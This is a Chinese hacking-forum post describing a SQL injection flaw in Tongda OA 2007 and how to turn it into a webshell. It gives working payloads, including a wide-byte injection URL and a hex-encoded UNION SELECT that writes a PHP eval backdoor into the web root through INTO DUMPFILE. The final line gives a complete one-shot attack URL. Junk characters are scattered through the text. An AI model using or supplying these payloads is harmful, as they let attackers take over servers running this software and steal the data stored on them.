找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2382|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
8 F! @& w' x8 B4 P; K- d4 }* C) ?4 [6 p6 B; b' ~+ L  e
% ^  q. q% t4 H4 O3 R6 p1 [
Office Anywhere 2007 网络智能办公系统' j( G. q( E: f9 h) ^7 s% c/ \5 e
7 i3 ?" x$ ^: P) h$ c/ r
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
9 z  J) c6 B, x- @) A8 g 9 _' U) U) O# R. V

; M+ ^) K$ L3 l) D3 e: d2 J$ I这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的/ D) j( b- m+ r6 @' q
/ O# Z% x& Q2 \+ W/ Y
例如:SELECT * from USER where USER_ID='{$USERNAME}'  ! _! g& @1 J1 x- R5 d. t& m
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
% ?, u. f/ h, p1 z, Z9 Q
/ }8 O4 P& P6 R这个时候我们是不是可以组合起来使用哪?
+ s/ f6 r: E; u. d9 ]
* w: J9 ]' c0 }( i# D. ^第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
3 W8 u5 }. B! }! Punion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
: M( x; T9 p2 `! h4 n0 s+ [6 C
+ n6 x  r) U* _0 Q3 a+ ?这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了0 L5 m6 e1 t7 H  H9 C
% g. D4 t7 ?' V+ t) K. o2 r8 {
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
, f- C+ h" I1 r3 p
1 P6 D6 K, _( Y+ ?那么我们用字符串格式带入进行hex编码
5 L# S. s  x4 t! `% S0 P   Y/ m. w6 v& p- \: n8 j0 J
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%232 R( p) a. B6 ^8 ]" ]2 r1 W

# O9 Y+ B: V. J- H测试ok,获取oa的webshell4 w" r  Q3 Y% M; H. c( ]- a$ h
8 {! t3 q$ M2 _7 Y0 Q

# w% s4 |" H. w( ]8 Dpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
1 B' [, n' m7 e1 W直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表